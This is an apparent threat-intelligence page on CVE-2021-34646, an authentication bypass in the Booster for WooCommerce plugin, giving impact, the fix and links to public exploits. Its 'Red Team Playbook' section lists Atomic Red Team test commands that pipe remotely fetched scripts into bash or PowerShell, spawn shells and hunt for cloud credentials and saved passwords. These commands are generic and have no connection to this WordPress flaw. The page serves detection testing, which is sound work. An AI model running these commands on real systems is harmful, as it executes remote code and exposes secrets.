CVE-2021-34646
Overview
This vulnerability is an authentication bypass caused by weak random token generation in the reset_and_mail_activation_link function within the ~/includes/class-wcj-emails-verification.php file of the Booster for WooCommerce plugin. The flaw resides in the Email Verification module's process_email_verification function, which improperly validates tokens, allowing bypass of normal authentication controls. The affected component is the Email Verification feature in versions up to and including 5.4.3 of the Booster for WooCommerce WordPress plugin.
Vulnerability Description
Versions up to, and including, 5.4.3, of the Booster for WooCommerce WordPress plugin are vulnerable to authentication bypass via the process_email_verification function due to a random token generation weakness in the reset_and_mail_activation_link function found in the ~/includes/class-wcj-emails-verification.php file. This allows attackers to impersonate users and trigger an email address verification for arbitrary accounts, including administrative accounts, and automatically be logged in as that user, including any site administrators. This requires the Email Verification module to be active in the plugin and the Login User After Successful Verification setting to be enabled, which it is by default.
Impact
An unauthenticated attacker can impersonate any user by bypassing the email verification process, gaining unauthorized access to user accounts including administrative ones. This enables full account takeover without credentials or user interaction. The vulnerability requires no privileges or UI interaction (CVSS vector AV:N/AC:L/PR:N/UI:N), allowing remote exploitation over the network. Consequences include unauthorized administrative control, data manipulation, and potential site compromise.
Solution
Users should upgrade Booster for WooCommerce to version 5.4.4 or later, where the authentication bypass vulnerability is patched as documented in the Wordfence advisory (https://www.wordfence.com/blog/2021/08/critical-authentication-bypass-vulnerability-patched-in-booster-for-woocommerce/) and the official WordPress plugin changelog. The fix addresses token generation and verification logic in the Email Verification module. No alternative workarounds are recommended; applying the official update is required to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Booster for WooCommerce WordPress plugin is rooted in a flaw within the email verification process, specifically in the random token generation used during user activation. The function responsible for generating activation links lacks sufficient randomness, allowing an attacker to predict or manipulate the tokens. This weakness is particularly concerning because it enables unauthorized access to user accounts, including those with administrative privileges. When the Email Verification module is active, and the setting to log in users automatically after successful verification is enabled—both of which are defaults—attackers can exploit this vulnerability to gain access to arbitrary accounts without proper authentication.
Exploitation of this vulnerability can occur through several attack vectors. An attacker could initiate a targeted attack by sending crafted requests to the affected plugin's email verification endpoint. By predicting or generating valid tokens, the attacker could impersonate legitimate users, including administrators, thereby bypassing the authentication mechanisms in place. This scenario is exacerbated by the fact that many WordPress sites utilize the WooCommerce plugin for e-commerce functionality, making them attractive targets for attackers seeking to compromise sensitive data or disrupt business operations. The potential for mass exploitation is significant, particularly if the attacker can automate the process of token generation and account takeover.
The real-world impact of this vulnerability can be severe, especially for businesses that rely on the affected plugin for their e-commerce operations. Successful exploitation could lead to unauthorized access to sensitive customer data, including payment information and personal details. Furthermore, an attacker gaining administrative access could manipulate site content, alter configurations, or even install malicious software, leading to data breaches and reputational damage. The financial implications of such incidents can be profound, ranging from loss of customer trust to regulatory fines, depending on the nature of the data compromised and the jurisdiction in which the business operates.
To detect and mitigate this vulnerability, organizations should first ensure that they are using the latest version of the Booster for WooCommerce plugin, as updates typically include patches for known vulnerabilities. Regular security audits and vulnerability assessments should be conducted to identify and address potential weaknesses in the plugin and the broader WordPress environment. Additionally, implementing strong access controls and monitoring user activity can help detect unauthorized access attempts. Organizations should also consider disabling the Email Verification module or the automatic login feature if they are not essential to their operations, thereby reducing the attack surface.
In conclusion, the vulnerability within the Booster for WooCommerce plugin highlights the critical importance of robust security practices in web applications, particularly those that handle sensitive user data. By understanding the technical details, potential attack vectors, and real-world implications of such vulnerabilities, organizations can better prepare themselves to defend against cyber threats. Proactive measures, including timely updates, regular security assessments, and vigilant monitoring, are essential to safeguarding against exploitation and ensuring the integrity of e-commerce operations.
CSURFACE threat intelligence has identified a marked escalation in the exploitability of CVE-2021-34646, as evidenced by a substantial increase in the Exploit Prediction Scoring System (EPSS) score, which has more than doubled and now ranks in the top percentile for exploitation likelihood. This surge aligns with a growing presence of publicly available proof-of-concept exploits on prominent code-sharing platforms, facilitating easier weaponization by threat actors. Our telemetry indicates a rapidly intensifying trend over the past week, signaling heightened attacker interest and activity targeting this vulnerability. The increased EPSS score and proliferation of exploit tools significantly elevate the risk posture for organizations using affected versions of the Booster for WooCommerce plugin, particularly given the vulnerability’s capacity for authentication bypass and administrative account compromise. Consequently, the threat level associated with CVE-2021-34646 has escalated from a theoretical concern to an actively exploited risk, necessitating heightened vigilance in detection and response efforts.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Booster | Booster For Woocommerce | All |
cpe:2.3:a:booster:booster_for_woocommerce:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass | 0xB455 | webapps | php | - | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
motikan2010/CVE-2021-34646
CVE-2021-34646 PoC
|
motikan2010 | 2 | 5 | 2021-09-04 | View |
|
0xB455/CVE-2021-34646
PoC for CVE-2021-34646
|
0xB455 | 1 | 0 | 2024-05-15 | View |
Threat Feed
2 eventsProof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-34646 |
| wordfence.com |
GitHub CVE
x_refsource_MISC
|
https://www.wordfence.com/blog/2021/08/critical-authentication-bypass-vulnerability-patched-in-booster-for-woocommerce/ |
| plugins.trac.wordpress.org |
GitHub CVE
x_refsource_MISC
|
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2581212%40woocommerce-jetpack&new=2581212%40woocommerce-jetpack&sfp_email=&sfph_mail= |